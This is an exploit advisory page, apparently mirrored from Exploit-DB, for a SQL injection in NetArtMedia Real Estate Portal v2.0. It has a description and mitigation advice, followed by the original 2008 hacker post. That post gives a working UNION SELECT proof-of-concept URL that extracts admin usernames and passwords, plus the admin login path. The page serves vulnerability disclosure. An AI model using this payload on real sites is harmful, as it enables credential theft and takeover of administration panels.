NetArtMedia Real Estate Portal v2.0 Sql Injection Vulnerability

vendor:

NetArtMedia Real Estate Portal

by:

R4Q!4N H4CK3R

CVSS

HIGH

SQL Injection

CWE

Product Name: NetArtMedia Real Estate Portal

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: a:netartmedia:netartmedia_real_estate_portal:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

NetArtMedia Real Estate Portal v2.0 Sql Injection Vulnerability

A vulnerability exists in NetArtMedia Real Estate Portal v2.0 which allows an attacker to inject malicious SQL queries via the 'mod' and 'ad' parameters in the 'index.php' file. An attacker can exploit this vulnerability to gain access to the administration panel by sending a specially crafted HTTP request to the vulnerable application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.

Source

Exploit-DB raw data:

######## ##    ##  ######  ########  ##    ## ########  ########  #######  ########
##       ###   ## ##    ## ##     ##  ##  ##  ##     ##    ##    ##     ## ##     ##
##       ####  ## ##       ##     ##   ####   ##     ##    ##           ## ##     ##
######   ## ## ## ##       ########     ##    ########     ##     #######  ##     ##
##       ##  #### ##       ##   ##      ##    ##           ##           ## ##     ##
##       ##   ### ##    ## ##    ##     ##    ##           ##    ##     ## ##     ##
######## ##    ##  ######  ##     ##    ##    ##           ##     #######  ########
################################ !R4Q!4N H4CK3R  ###################################
NetArtMedia Real Estate Portal v2.0  Sql Injection Vulnerability
Website    : http://www.netartmedia.net
Founded By : Encrypt3d.M!nd
Home Page  : http://encrypt3d.blogspot.com

# Remote Sql Injection(s) :
Affected File :
index.php

PoC:
/index.php?mod=re_search&ad=-666 union select 1,2,password,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from websiteadmin_admin_users

Administration Panel:
/ADMIN/login.php

# Greetz:
MY Sweet,L!0N,EL Mariachi,-=MizO=-,Shadow Administrator,
KoRn The Dog,MiNi-SpIder,All My Friends

The EnD :D

# milw0rm.com [2008-09-21]